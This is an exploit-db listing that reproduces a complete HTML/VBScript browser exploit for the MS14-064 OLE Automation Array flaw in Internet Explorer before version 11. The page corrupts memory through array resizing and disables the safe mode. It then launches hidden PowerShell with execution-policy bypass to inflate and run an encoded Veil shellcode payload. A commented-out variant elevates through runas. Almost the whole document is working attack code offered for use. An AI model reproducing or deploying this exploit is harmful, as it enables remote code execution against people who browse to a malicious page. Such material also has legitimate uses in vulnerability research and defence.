Microsoft Internet Explorer OLE Pre-IE11 – Automation Array Remote Code Execution / PowerShell VirtualAlloc (MS14-064)

  • 作者: GradiusX & b33f
    日期: 2014-11-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35308/
  • <!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>

<pre>
|--------------------------------------------------------------------------|
| Title: OLE Automation Array Remote Code Execution => Pre IE11|
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |
| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) |
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |
| Usage:http://www.fuzzysecurity.com/exploits/21.html|
|--------------------------------------------------------------------------|
 Very nice black-magic yuange, don't think it went unnoticed that you
 have been popping shells since 2009 :D人无千日好,花无百日红
|--------------------------------------------------------------------------|
</pre>

<SCRIPT LANGUAGE="VBScript">
function runmumaa() 
On Error Resume Next
set shell=createobject("Shell.Application")

'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!'text='Powershell FTW!'
payload="nVVdi9tGFH33rxiMHmzWWkYafTlmIWlDIVBCYZf2wfhhNBp1RWXJyHLqTZv/Xp1jXzfbvIS+zOed+3HOuVLg1IN6O59t37fth/2hH8bF/A8/dL418X3VtvPlTh1OZds4dRztOE3+PE736kM3/jIO6tdmGE+2fde2vVtcz/5cqVPTjep8nV+u8+fl5n/H+XHwdvRPz9NUSZzT1e+nlfo38nX1VezryX+j74+f3DB+T+y93x/9uPjW862q+dtZ0E9Avquq8Onl4FU4vSn98N7XTdeMTd+pwKnwo917Nf+t6Uw8V2E37Y4H67ziyU+nzsHyqMKDPR7H5+E0C84PQf/mzSuQ9UqfI60xmcuU6OVGbX94Gf12twuOYFSfSzvdlH4a0nIaqnoadIIVLlyF1XoacpzFGGoMKS5MBBPcllglsZylKYJjq82rbYFtjkApAhl4qfkC0YpSVjHs4mIaMgwWMTy8aHhxGOIMDnKY4FmSSwZJJsUweIwzywwAQoZVBWODojOcFTDJnJwlWEUImaDUAsYOrjTfOkGIzwxWDsVERA0mKbOiSSaQlE5KveCSSvYpb1lbJdmXpAu5WJpoiaFRVpRL4uQjIUwstbxFY/kwsYDTYlsjhkdZa+bCisj+WgAzRnJ2GGwsbGVWmPYwyZBLgUA1TNbEvhQCclwUMI5g5wrRCzN1pTAdZVJvokV6eSyuCCLR1dRfLtjTAcVAOC0c+FpqIy4+kVwuNFqhlgjVTgjInZCca8GgYBp4VuFF4UQ5OR0QXSNxHTmHcU2VYIi8SI89UxIrbD1u4/WtNmoSkBhkmhYiM4vBpcJ5iQvKu85EFvRiE8mAqbFXSRnB1kic3UN0CbZln99WFu7ZW449SEKtaCjLhWn2L+kmRwwUkW6qCTGo3UKLQBLYsY+ocSJOV57y5rckFm1UbNhYZMZ+uxBAV6mwcOkPwnnrvALD2kjlbGIWQyFlN6kwe4LNXiCDrJJvK0rUCKamlEDUGnEhySlQ44cxgtOMRaeSqXUiH34izVoqj9zqa53WVJi5VamFClYZ10xoM6v7QS2C5kFvgkaFrZ82R3f/s+9+H5/DaDmd3t0t1V/48F//PNvLr2e3CM73T/20MfFieRc0y5Wanm6DZrdS0VL9rfrTGHantt18mQWf+et49d+cEloF5xUm/DIeRzuM4WPr/UGFj971XaXwZ9H6Hw=="

command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

params="-NoP -NonI -Exec Bypass -Command " & command

'Original POC yuange
'set shell=createobject("Shell.Application")
'shell.ShellExecute "notepad.exe"

'With UAC
'shell.ShellExecute "powershell", params, "", "runas", 0

'Without UAC
shell.ShellExecute "powershell", params, "", "", 0

end function
</script>

<SCRIPT LANGUAGE="VBScript">
 
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray

Begin()

function Begin()
On Error Resume Next
info=Navigator.UserAgent

if(instr(info,"Win64")>0) then
 exit function
end if

if (instr(info,"MSIE")>0) then 
 intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) 
else
 exit function
 
end if

win9x=0

BeginInit()
If Create()=True Then
 myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
 myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

 if(intVersion<4) then
 document.write("<br> IE")
 document.write(intVersion)
 runshellcode()
 else
setnotsafemode()
 end if
end if
end function

function BeginInit()
 Randomize()
 redim aa(5)
 redim ab(5)
 a0=13+17*rnd(6)
 a3=7+3*rnd(5)
end function

function Create()
On Error Resume Next
dim i
Create=False
For i = 0 To 400
If Over()=True Then
' document.write(i) 
 Create=True
 Exit For
End If 
Next
end function

sub testaa()
end sub

function mydata()
On Error Resume Next
 i=testaa
 i=null
 redimPreserve aa(a2)

 ab(0)=0
 aa(a1)=i
 ab(0)=6.36598737437801E-314

 aa(a1+2)=myarray
 ab(2)=1.74088534731324E-310
 mydata=aa(a1)
 redimPreserve aa(a0)
end function 


function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redimPreserve aa(a2) 
 aa(a1+2)(i+&h11c+k)=ab(4)
redimPreserve aa(a0)

 j=0 
j=readmemo(i+&h120+k) 
 
 Exit for
 end if

next 
ab(2)=1.69759663316747E-313
runmumaa() 
end function

function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redimPreserve aa(a0) 
redim ab(a0) 

redimPreserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10

If(IsObject(aa(a1-1)) = False) Then
 if(intVersion<4) then
 mem=cint(a0+1)*16 
 j=vartype(aa(a1-1))
 if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0)Then
 If(IsObject(aa(a1)) = False ) Then 
 type1=VarType(aa(a1))
 end if 
end if
 else
 redimPreserve aa(a0)
 exitfunction

 end if 
else
 if(vartype(aa(a1-1))<>0)Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if 
end if
end if
end if


If(type1=&h2f66) Then 
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

redimPreserve aa(a0)

end function

function ReadMemo(add) 
On Error Resume Next
redimPreserve aa(a2)

ab(0)=0 
aa(a1)=add+4 
ab(0)=1.69759663316747E-313 
ReadMemo=lenb(aa(a1))
 
ab(0)=0
 
redimPreserve aa(a0)
end function

</script>

</body>
</html>